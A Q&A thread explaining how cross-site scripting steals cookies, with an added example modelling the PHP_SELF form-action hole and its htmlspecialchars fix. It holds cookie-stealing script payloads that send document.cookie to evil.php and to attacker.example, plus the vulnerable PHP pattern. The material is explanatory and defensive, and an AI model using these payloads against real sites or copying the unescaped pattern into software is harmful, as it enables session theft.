I understand that XSS is when you can get a site to run arbitrary JavaScript by appending it to a URL or embedding it in the page somehow.

I understand this is bad because it can allow people to steal cookies and such.

What I don't understand is how that is possible. All my reading about it just shows people using alert() to display the cookie... which would display it to the user clicking on it.

Is it actually possible with JS to send a cookie remotely to another PC? How?

A: 

This post might help: http://airodump.net/advanced-cross-site-scripting-xss/

gulbrandr
A: 

Yes, if a hacker can add his JavaScript code into the page, he can send cookies with AJAX or with a form post. The JavaScript method document.cookie holds the cookie information for that domain.

Adeel
A: 
    <SCRIPT type="text/javascript">
    // Build the collector URL with the victim's cookies in the query string.
    var adr = '../evil.php?cakemonster=' + escape(document.cookie);
    // Issue the GET request so the cookie actually reaches evil.php.
    new Image().src = adr;
    </SCRIPT>

The above code will pass the escaped content of the cookie (according to the RFC, content must be escaped before sending it over HTTP with the GET method) to the evil.php script in the "cakemonster" variable. The attacker then checks the results of his evil.php script (a cookie grabber script will usually write the cookie to a file) and uses it.

Source: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

SteD
A: 

First off, XSS does not mean JS-based attacks. XSS = cross-site scripting (forcing a site to run your script, any script).

Now for the issue at hand, think about the following:

    <form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">

This is an evil (and common) piece of code that allows you to force the running site to execute any script you write in the address bar (if you're interested, this vulnerability is described here). You can send the said URL (with the script) as a link, and anyone who clicks this link runs your script.

For instance, using VBScript you can transmit the cookie ID-ing the user back to yourself, and by that take over his identity. This is all done without the user or the host site even being aware that something's wrong.

Neowizard
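What the PHP_SELF form action above does with a crafted link, as an added example that is not from the original answer: the PHP template is modelled as a JavaScript function so it runs without PHP, the request path is what `$_SERVER['PHP_SELF']` would contain (PHP appends any extra path segments after the script name), and the hardened version applies the equivalent of `htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES)`. The page name `login.php`, the attacker host and the payload are constructed for the demonstration.

```javascript
// Added example (not from the original answer): reflected XSS through
// $_SERVER['PHP_SELF'] in a form action, and its fix, modelled in JavaScript.

// Vulnerable rendering: the path is dropped into the attribute verbatim,
// exactly as the one-line PHP template in the answer does.
function renderFormVulnerable(phpSelf) {
  return '<form method="post" action="' + phpSelf + '">';
}

// Fixed rendering: the five characters htmlspecialchars() with ENT_QUOTES
// encodes, applied before the value enters the attribute.
function htmlspecialchars(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}
function renderFormFixed(phpSelf) {
  return '<form method="post" action="' + htmlspecialchars(phpSelf) + '">';
}

// Crude detector for "the site now runs the attacker's script": a <script>
// tag or an inline event handler that the template itself never emits.
function containsInjectedScript(html) {
  return /<script\b/i.test(html) || /\son[a-z]+\s*=/i.test(html);
}

// Constructed request. The victim clicks a link to
//   /login.php/"><script>...</script>
// and PHP sets $_SERVER['PHP_SELF'] to the script path plus that trailing
// path-info, quotes and angle brackets included.
const PHP_SELF = `/login.php/"><script>new Image().src='https://attacker.example/evil.php?cakemonster='+document.cookie</script>`;

console.log(renderFormVulnerable(PHP_SELF)); // attribute closed, tag injected
console.log(renderFormFixed(PHP_SELF));      // quotes and brackets neutralised
```

The vulnerable output closes the `action` attribute at the injected `"` and the rest of the path becomes live markup; the fixed output keeps the whole path inside the attribute as text. `htmlspecialchars()` is the minimum; rendering a fixed action (or simply omitting `action`, which posts to the current URL) avoids reflecting the request path at all.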